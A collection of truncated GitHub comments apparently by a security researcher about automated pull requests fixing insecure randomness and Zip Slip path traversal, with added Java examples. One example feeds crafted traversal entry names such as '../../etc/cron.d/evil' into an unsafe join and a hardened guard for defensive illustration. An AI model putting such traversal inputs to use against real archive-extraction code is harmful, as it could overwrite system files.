Jonathan Leitschuh
@chtompki Because many people don't read the documentation. Especially at the top of classes. I've found this class of vulnerability in other places because of similar issues around not reading...
Any thoughts on my proposal here around moving the use of insecure randomness to be a more explicit decision as I detailed above: https://github.com/apache/commons-lang/pull/459#issuecomment-532330032 I've got two more public more...
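The two comments above are about the same design question: a library convenience method that quietly draws from `java.util.Random` is an insecure default that callers only discover by reading the class-level Javadoc. The following is an added illustration of the "make it an explicit decision" idea, written for this page; it is not the commons-lang proposal's code and uses only hypothetical names (`randomAlphanumeric`, `ExplicitRandomness`).

```java
import java.security.SecureRandom;
import java.util.Random;

public class ExplicitRandomness {
    private static final String ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789";

    // Implicit-default pattern (hypothetical): the overload without a Random
    // parameter silently uses java.util.Random. Nothing in the signature tells
    // a caller that the result is unsuitable for session ids or reset tokens.
    private static final Random SHARED = new Random();

    static String randomAlphanumeric(int count) {
        return randomAlphanumeric(count, SHARED);
    }

    // Explicit-decision pattern: the caller must pass the Random instance, so
    // "new Random()" versus "new SecureRandom()" is a visible line in their
    // code and in code review.
    static String randomAlphanumeric(int count, Random rng) {
        StringBuilder sb = new StringBuilder(count);
        for (int i = 0; i < count; i++) {
            sb.append(ALPHABET.charAt(rng.nextInt(ALPHABET.length())));
        }
        return sb.toString();
    }

    // Why the distinction matters: java.util.Random is a 48-bit LCG whose
    // entire output stream is fixed by its seed. Two instances with the same
    // seed yield identical "tokens"; SecureRandom gives no such reproduction.
    static boolean reproducible(long seed, int count) {
        return randomAlphanumeric(count, new Random(seed))
                .equals(randomAlphanumeric(count, new Random(seed)));
    }

    public static void main(String[] args) {
        System.out.println("implicit default : " + randomAlphanumeric(16));
        System.out.println("explicit insecure: " + randomAlphanumeric(16, new Random(42L)));
        System.out.println("explicit secure  : " + randomAlphanumeric(16, new SecureRandom()));
        System.out.println("same seed, same token: " + reproducible(42L, 16));
    }
}
```

Compile with `javac ExplicitRandomness.java && java ExplicitRandomness`. The point of the second overload is not that it is harder to misuse mechanically, but that the choice of generator appears at the call site, where a reviewer or a static-analysis rule can see it without consulting the documentation.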
> This PR needs a test that fails without the main change, otherwise it's just one commit away from a regression.

I agree! The code generator used to generate this...
> Uh? You created the PR...

I used a bot to create the PR on my behalf, as well as generate the fix, as well as generated fixes for 30...
> I am not sure if your tool is a fuzzer, or a static or runtime analyzer that tries to use existing exploits against code bases.

OpenRewrite is a Format...
> I am sure you are well-intentioned but the path you chose (arg, pun) is not the best one for the community,

I do appreciate the pun 😂

> please...
> Otherwise, even though I believe fixing these issues is beneficial to users, in the end your pull requests may end up stalled for a long time until a volunteer...
I believe so. I think line 58 will always be true. The logic that I'm using to detect this vulnerability looks for the `File.separator` to be appended, but if it...
Looking at this manually, I don't think this vulnerability is present. It's adequately guarded against by this check here: https://github.com/srikanth-lingala/zip4j/blob/9c7bb74ced690387d80882d896faf5640b530196/src/main/java/net/lingala/zip4j/util/FileUtils.java#L215-L217 However, that check will always be true on Linux-type systems...
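Both comments above concern the same bug class (Zip Slip: an archive entry name such as `../../etc/cron.d/evil` joined onto the extraction directory) and the subtlety that a guard's behaviour depends on `File.separator`, which differs between platforms. The following is an added example written for this page; it is not zip4j's code and does not reproduce the check linked above. It contrasts the vulnerable join with a canonical-path check that uses the trailing separator deliberately, with hypothetical names (`ZipSlipGuard`, `unsafeTarget`, `safeTarget`) and constructed entry names.

```java
import java.io.File;
import java.io.IOException;

public class ZipSlipGuard {

    // The pattern Zip Slip relies on: the entry name from the archive is
    // trusted and joined onto the destination without normalisation, so
    // "../" components walk out of destDir.
    static File unsafeTarget(File destDir, String entryName) {
        return new File(destDir, entryName);
    }

    // Hardened form: canonicalise both sides and require the candidate to sit
    // strictly below destDir. The separator appended to destPath is what stops
    // a sibling directory such as "/tmp/out-evil" from passing a plain
    // startsWith() against "/tmp/out". Because File.separator is "/" on
    // Linux and "\" on Windows, the same check behaves differently per OS:
    // on Linux, an entry named "..\\..\\x" is a single file name, not a
    // traversal, and is accepted as such.
    static File safeTarget(File destDir, String entryName) throws IOException {
        File candidate = new File(destDir, entryName);
        String destPath = destDir.getCanonicalPath();
        String candidatePath = candidate.getCanonicalPath();
        if (!destPath.endsWith(File.separator)) {
            destPath += File.separator;
        }
        if (!candidatePath.startsWith(destPath)) {
            throw new IOException("Zip entry escapes destination: " + entryName);
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        File dest = new File(System.getProperty("java.io.tmpdir"), "extract-here");
        // Constructed entry names: benign, a traversal, and a sibling-prefix
        // case that only the trailing-separator check catches.
        String[] entries = {
            "docs/readme.txt",
            "../../etc/cron.d/evil",
            "../extract-here-evil/x",
        };
        for (String e : entries) {
            System.out.println("entry  : " + e);
            System.out.println("unsafe -> " + unsafeTarget(dest, e).getCanonicalPath());
            try {
                System.out.println("safe   -> " + safeTarget(dest, e).getCanonicalPath());
            } catch (IOException ex) {
                System.out.println("safe   -> rejected: " + ex.getMessage());
            }
        }
    }
}
```

Run with `javac ZipSlipGuard.java && java ZipSlipGuard`. On a Linux host the first entry is accepted, the second is rejected because its canonical path leaves `extract-here`, and the third is rejected only because the comparison prefix ends in `File.separator`; drop that line and `/tmp/extract-here-evil/x` would satisfy `startsWith("/tmp/extract-here")`. That is why a detector or a guard that keys on whether `File.separator` was appended is only meaningful once you fix which platform's separator is in play.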
Makes sense. Don't know if it's valuable printing what object where the field has been moving. I've personally found it to be very helpful when debugging.